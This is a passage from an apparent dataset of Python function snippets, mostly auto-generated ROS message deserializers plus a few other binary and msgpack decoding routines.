_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.goal.gripper_goal_frame.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 
60\n (_x.goal.gripper_goal_frame.pose.position.x, _x.goal.gripper_goal_frame.pose.position.y, _x.goal.gripper_goal_frame.pose.position.z, _x.goal.gripper_goal_frame.pose.orientation.x, _x.goal.gripper_goal_frame.pose.orientation.y, _x.goal.gripper_goal_frame.pose.orientation.z, _x.goal.gripper_goal_frame.pose.orientation.w, _x.goal.perception_source,) = _get_struct_7di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _from_string(cls, serialized):\r\n parse = cls.parse_url(serialized)\r\n\r\n if parse['version_guid']:\r\n parse['version_guid'] = cls.as_object_id(parse['version_guid'])\r\n\r\n return cls(**{key: parse.get(key) for key in cls.KEY_FIELDS})", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.pan is None:\n self.pan = movo_msgs.msg.PanTiltActuatorFdbk()\n if self.tilt is None:\n self.tilt = movo_msgs.msg.PanTiltActuatorFdbk()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.pan.header.seq, _x.pan.header.stamp.secs, _x.pan.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.pan.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.pan.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 64\n (_x.pan.current, _x.pan.pos_rad, _x.pan.vel_rps, _x.pan.torque_nm, _x.pan.pwm, _x.pan.encoder_rad, _x.pan.accel.x, _x.pan.accel.y, _x.pan.accel.z, _x.pan.temperature_degC, _x.tilt.header.seq, _x.tilt.header.stamp.secs, _x.tilt.header.stamp.nsecs,) = _struct_6f3df3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tilt.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.tilt.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 52\n (_x.tilt.current, _x.tilt.pos_rad, _x.tilt.vel_rps, _x.tilt.torque_nm, _x.tilt.pwm, _x.tilt.encoder_rad, _x.tilt.accel.x, _x.tilt.accel.y, _x.tilt.accel.z, _x.tilt.temperature_degC,) = _struct_6f3df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (self.yaw,) = _struct_f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def decode(self, s):", "def decode(self, s):", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.Hlines is None:\n self.Hlines = None\n if self.Vlines is None:\n self.Vlines = None\n if self.regions is None:\n self.regions = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n 
self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 4\n (_x.image_width, _x.image_height,) = _get_struct_2H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Hlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Hlines.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.Vlines = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.Vlines.append(val1)\n start = end\n end += 2\n (self.PFPS,) = _get_struct_H().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.regions = []\n for i in range(0, length):\n val1 = cooperative_driving_vision.msg.Region()\n _v3 = val1.color\n _x = _v3\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n _v4 = val1.moment\n _x = _v4\n start = end\n end += 40\n (_x.m00, _x.m10, _x.m01, _x.m11, _x.m20, _x.m02, _x.m21, _x.m12, _x.m30, _x.m03,) = _get_struct_10f().unpack(str[start:end])\n self.regions.append(val1)\n _x = self\n start = end\n end += 4\n (_x.box_width, _x.box_height,) = _get_struct_2H().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.c0 is None:\n self.c0 = bh_motion.msg.Vector3()\n if self.c1 is None:\n self.c1 = bh_motion.msg.Vector3()\n if self.c2 is None:\n self.c2 = bh_motion.msg.Vector3()\n end = 0\n _x = self\n start = end\n end += 36\n (_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z,) = _struct_9f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.des_gripper_pose is None:\n self.des_gripper_pose = geometry_msgs.msg.PoseStamped()\n if self.object_pose is None:\n self.object_pose = geometry_msgs.msg.PoseStamped()\n end = 0\n _x = self\n start = end\n end += 20\n (_x.manip_return_code, _x.object_grabber_return_code, _x.des_gripper_pose.header.seq, _x.des_gripper_pose.header.stamp.secs, _x.des_gripper_pose.header.stamp.nsecs,) = _get_struct_2i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.des_gripper_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.des_gripper_pose.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 72\n (_x.des_gripper_pose.pose.position.x, _x.des_gripper_pose.pose.position.y, _x.des_gripper_pose.pose.position.z, _x.des_gripper_pose.pose.orientation.x, _x.des_gripper_pose.pose.orientation.y, _x.des_gripper_pose.pose.orientation.z, _x.des_gripper_pose.pose.orientation.w, _x.object_finder_return_code, _x.object_pose.header.seq, _x.object_pose.header.stamp.secs, _x.object_pose.header.stamp.nsecs,) = _get_struct_7di3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.object_pose.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.object_pose.header.frame_id = 
str[start:end]\n _x = self\n start = end\n end += 56\n (_x.object_pose.pose.position.x, _x.object_pose.pose.position.y, _x.object_pose.pose.position.z, _x.object_pose.pose.orientation.x, _x.object_pose.pose.orientation.y, _x.object_pose.pose.orientation.z, _x.object_pose.pose.orientation.w,) = _get_struct_7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.obstacleinfo is None:\n self.obstacleinfo = nubot_common.msg.ObstaclesInfo()\n if self.oppinfo is None:\n self.oppinfo = nubot_common.msg.ObstaclesInfo()\n if self.robotinfo is None:\n self.robotinfo = None\n if self.ballinfo is None:\n self.ballinfo = None\n if self.coachinfo is None:\n self.coachinfo = nubot_common.msg.CoachInfo()\n if self.pass_cmd is None:\n self.pass_cmd = nubot_common.msg.PassCommands()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.obstacleinfo.header.seq, _x.obstacleinfo.header.stamp.secs, _x.obstacleinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.obstacleinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.obstacleinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.obstacleinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.obstacleinfo.polar_pos.append(val1)\n _x = self\n start = end\n end += 12\n (_x.oppinfo.header.seq, _x.oppinfo.header.stamp.secs, _x.oppinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.oppinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.oppinfo.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.Point2d()\n _x = val1\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.oppinfo.polar_pos = []\n for i in range(0, length):\n val1 = nubot_common.msg.PPoint()\n _x = val1\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n self.oppinfo.polar_pos.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.robotinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.RobotInfo()\n 
_v12 = val1.header\n start = end\n end += 4\n (_v12.seq,) = _get_struct_I().unpack(str[start:end])\n _v13 = _v12.stamp\n _x = _v13\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v12.frame_id = str[start:end].decode('utf-8')\n else:\n _v12.frame_id = str[start:end]\n _x = val1\n start = end\n end += 28\n (_x.AgentID, _x.targetNum1, _x.targetNum2, _x.targetNum3, _x.targetNum4, _x.staticpassNum, _x.staticcatchNum,) = _get_struct_7i().unpack(str[start:end])\n _v14 = val1.pos\n _x = _v14\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v15 = val1.heading\n start = end\n end += 4\n (_v15.theta,) = _get_struct_f().unpack(str[start:end])\n start = end\n end += 4\n (val1.vrot,) = _get_struct_f().unpack(str[start:end])\n _v16 = val1.vtrans\n _x = _v16\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 9\n (_x.iskick, _x.isvalid, _x.isstuck, _x.isdribble, _x.current_role, _x.role_time,) = _get_struct_5Bf().unpack(str[start:end])\n val1.iskick = bool(val1.iskick)\n val1.isvalid = bool(val1.isvalid)\n val1.isstuck = bool(val1.isstuck)\n val1.isdribble = bool(val1.isdribble)\n _v17 = val1.target\n _x = _v17\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n self.robotinfo.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.ballinfo = []\n for i in range(0, length):\n val1 = nubot_common.msg.BallInfo()\n _v18 = val1.header\n start = end\n end += 4\n (_v18.seq,) = _get_struct_I().unpack(str[start:end])\n _v19 = _v18.stamp\n _x = _v19\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v18.frame_id = str[start:end].decode('utf-8')\n else:\n _v18.frame_id = str[start:end]\n start = end\n end += 4\n (val1.ballinfostate,) = _get_struct_i().unpack(str[start:end])\n _v20 = val1.pos\n _x = _v20\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _v21 = val1.real_pos\n _x = _v21\n start = end\n end += 8\n (_x.angle, _x.radius,) = _get_struct_2f().unpack(str[start:end])\n _v22 = val1.velocity\n _x = _v22\n start = end\n end += 8\n (_x.x, _x.y,) = _get_struct_2f().unpack(str[start:end])\n _x = val1\n start = end\n end += 2\n (_x.pos_known, _x.velocity_known,) = _get_struct_2B().unpack(str[start:end])\n val1.pos_known = bool(val1.pos_known)\n val1.velocity_known = bool(val1.velocity_known)\n self.ballinfo.append(val1)\n _x = self\n start = end\n end += 12\n (_x.coachinfo.header.seq, _x.coachinfo.header.stamp.secs, _x.coachinfo.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.coachinfo.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.coachinfo.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 54\n (_x.coachinfo.MatchMode, _x.coachinfo.MatchType, _x.coachinfo.TestMode, _x.coachinfo.pointA.x, _x.coachinfo.pointA.y, _x.coachinfo.pointB.x, _x.coachinfo.pointB.y, _x.coachinfo.angleA, _x.coachinfo.angleB, _x.coachinfo.idA, _x.coachinfo.idB, _x.coachinfo.kickforce, _x.pass_cmd.pass_id, _x.pass_cmd.catch_id, _x.pass_cmd.pass_pt.x, 
_x.pass_cmd.pass_pt.y, _x.pass_cmd.catch_pt.x, _x.pass_cmd.catch_pt.y, _x.pass_cmd.is_passout, _x.pass_cmd.is_dynamic_pass, _x.pass_cmd.is_static_pass, _x.pass_cmd.is_valid,) = _get_struct_3B4f2h3B2I4f4B().unpack(str[start:end])\n self.pass_cmd.is_passout = bool(self.pass_cmd.is_passout)\n self.pass_cmd.is_dynamic_pass = bool(self.pass_cmd.is_dynamic_pass)\n self.pass_cmd.is_static_pass = bool(self.pass_cmd.is_static_pass)\n self.pass_cmd.is_valid = bool(self.pass_cmd.is_valid)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def unpack(msg_bytes):\n canid, dlc, data = struct.unpack(CANMessage.msg_fmt, msg_bytes)\n msg = CANMessage(canid, data, dlc)\n return msg", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 24\n self.thumb = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.index = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.middle = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.ring = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.little = _get_struct_3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def _decode_str(self, buf):\n length = self._decode_vint(buf)\n result = buf.read(length)\n if len(result) != length:\n raise EndOfMessage(True)\n return result", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 44\n (_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag,) = _struct_2I2d4fh2B.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (self.numberOfTSPTurtles,) = _get_struct_i().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def _to_jsonrpc_obj(self, jsonrpcstr):\n return jsonrpc.JsonRpcData.parse(jsonrpcstr)", "def deserialize(self, str):\n try:\n if self.base is None:\n self.base = rwrc12_msgs.msg.CellBase()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.base.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.base.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 20\n (_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z,) = _struct_5f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.base.points = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Point32()\n _x = val1\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n self.base.points.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n self.base.intensity = struct.unpack(pattern, str[start:end])\n start = end\n end += 1\n (self.base.cost,) = _struct_b.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 
start = end\n end += length\n if python3:\n self.base.label = str[start:end].decode('utf-8')\n else:\n self.base.label = str[start:end]\n _x = self\n start = end\n end += 8\n (_x.mean_height, _x.mean_intensity,) = _struct_2f.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def loads(msg, encoding=None, raw=False):\n try:\n\n def ext_type_decoder(code, data):\n if code == 78:\n data = salt.utils.stringutils.to_unicode(data)\n return datetime.datetime.strptime(data, \"%Y%m%dT%H:%M:%S.%f\")\n if code == 79:\n name, value = salt.utils.msgpack.loads(data, raw=False)\n return _Constant(name, value)\n return data\n\n gc.disable() # performance optimization for msgpack\n loads_kwargs = {\"use_list\": True, \"ext_hook\": ext_type_decoder}\n if salt.utils.msgpack.version >= (0, 4, 0):\n # msgpack only supports 'encoding' starting in 0.4.0.\n # Due to this, if we don't need it, don't pass it at all so\n # that under Python 2 we can still work with older versions\n # of msgpack.\n if salt.utils.msgpack.version >= (0, 5, 2):\n if encoding is None:\n loads_kwargs[\"raw\"] = True\n else:\n loads_kwargs[\"raw\"] = False\n else:\n loads_kwargs[\"encoding\"] = encoding\n try:\n ret = salt.utils.msgpack.unpackb(msg, **loads_kwargs)\n except UnicodeDecodeError:\n # msg contains binary data\n loads_kwargs.pop(\"raw\", None)\n loads_kwargs.pop(\"encoding\", None)\n ret = salt.utils.msgpack.loads(msg, **loads_kwargs)\n else:\n ret = salt.utils.msgpack.loads(msg, **loads_kwargs)\n if encoding is None and not raw:\n ret = salt.transport.frame.decode_embedded_strs(ret)\n except Exception as exc: # pylint: disable=broad-except\n log.critical(\n \"Could not deserialize msgpack message. This often happens \"\n \"when trying to read a file not in binary mode. \"\n \"To see message payload, enable debug logging and retry. \"\n \"Exception: %s\",\n exc,\n )\n log.debug(\"Msgpack deserialization failure on message: %s\", msg)\n exc_msg = \"Could not deserialize msgpack message. 
See log for more info.\"\n raise SaltDeserializationError(exc_msg) from exc\n finally:\n gc.enable()\n return ret", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.robot_id is None:\n self.robot_id = opil_v2.msg.Id()\n if self.agv_msg is None:\n self.agv_msg = opil_v2.msg.RobotDescriptionAGV()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.robot_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.robot_id.description = str[start:end].decode('utf-8')\n else:\n self.robot_id.description = str[start:end]\n _x = self\n start = end\n end += 12\n (_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.agv_msg.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.agv_msg.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.agv_msg.vendor = str[start:end].decode('utf-8')\n else:\n self.agv_msg.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.agv_msg.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.attributes = []\n for i in range(0, length):\n val2 = opil_v2.msg.Tuple()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.type = str[start:end].decode('utf-8')\n else:\n val2.type = str[start:end]\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.name = str[start:end].decode('utf-8')\n else:\n val2.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2.value = str[start:end].decode('utf-8')\n else:\n val2.value = str[start:end]\n val1.attributes.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.description = str[start:end].decode('utf-8')\n else:\n val1.description = str[start:end]\n self.agv_msg.action_capability.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n _x = self\n start = end\n end += 152\n (_x.tcp, _x.ori, _x.zone, _x.vacuum, _x.workx, _x.worky, _x.workz, _x.workq0, _x.workqx, _x.workqy, _x.workqz, _x.toolx, _x.tooly, _x.toolz, _x.toolq0, _x.toolqx, _x.toolqy, _x.toolqz, _x.ret,) = _struct_2d2q14dq.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.msg = str[start:end].decode('utf-8')\n else:\n self.msg = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.p1 is None:\n self.p1 = geometry_msgs.msg.PointStamped()\n if self.p2 is None:\n self.p2 = geometry_msgs.msg.PointStamped()\n if self.p3 is None:\n self.p3 = geometry_msgs.msg.PointStamped()\n if self.p4 is None:\n self.p4 = geometry_msgs.msg.PointStamped()\n end = 0\n _x = self\n start = end\n end += 16\n (_x.s1, _x.s2, _x.s3, _x.s4, _x.p1.header.seq, _x.p1.header.stamp.secs, _x.p1.header.stamp.nsecs,) = _struct_4B3I.unpack(str[start:end])\n self.s1 = bool(self.s1)\n self.s2 = bool(self.s2)\n self.s3 = bool(self.s3)\n self.s4 = bool(self.s4)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p1.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p1.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p1.point.x, _x.p1.point.y, _x.p1.point.z, _x.p2.header.seq, _x.p2.header.stamp.secs, _x.p2.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p2.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p2.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p2.point.x, _x.p2.point.y, _x.p2.point.z, _x.p3.header.seq, _x.p3.header.stamp.secs, _x.p3.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p3.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p3.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 36\n (_x.p3.point.x, _x.p3.point.y, _x.p3.point.z, _x.p4.header.seq, _x.p4.header.stamp.secs, _x.p4.header.stamp.nsecs,) = _struct_3d3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.p4.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.p4.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 24\n (_x.p4.point.x, 
_x.p4.point.y, _x.p4.point.z,) = _struct_3d.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, message):\n # Removes the random prefix\n message = message[12:]\n message = message.decode(\"utf-8\")\n\n if self.crypter:\n message = self.crypter.decrypt(message, self.expiry + 10)\n return json.loads(message)", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.polygons is None:\n self.polygons = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.polygons = []\n for i in range(0, length):\n val1 = cob_3d_mapping_msgs.msg.CurvedPolygon()\n _v2 = val1.stamp\n _x = _v2\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (val1.ID,) = _struct_I.unpack(str[start:end])\n start = end\n end += 24\n val1.parameter = _struct_6f.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.score = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.SimilarityScore()\n _x = val2\n start = end\n end += 8\n (_x.ID, _x.prob,) = _struct_If.unpack(str[start:end])\n val1.score.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.polyline = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.PolylinePoint()\n _x = val2\n start = end\n end += 12\n (_x.x, _x.y, _x.edge_prob,) = _struct_3f.unpack(str[start:end])\n val1.polyline.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.features = []\n for i in range(0, length):\n val2 = cob_3d_mapping_msgs.msg.Feature()\n _x = val2\n start = end\n end += 16\n (_x.x, _x.y, _x.z, _x.ID,) = _struct_3fI.unpack(str[start:end])\n val1.features.append(val2)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.energy = str[start:end].decode('utf-8')\n else:\n val1.energy = str[start:end]\n start = end\n end += 4\n (val1.weight,) = _struct_f.unpack(str[start:end])\n self.polygons.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 142\n (_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, 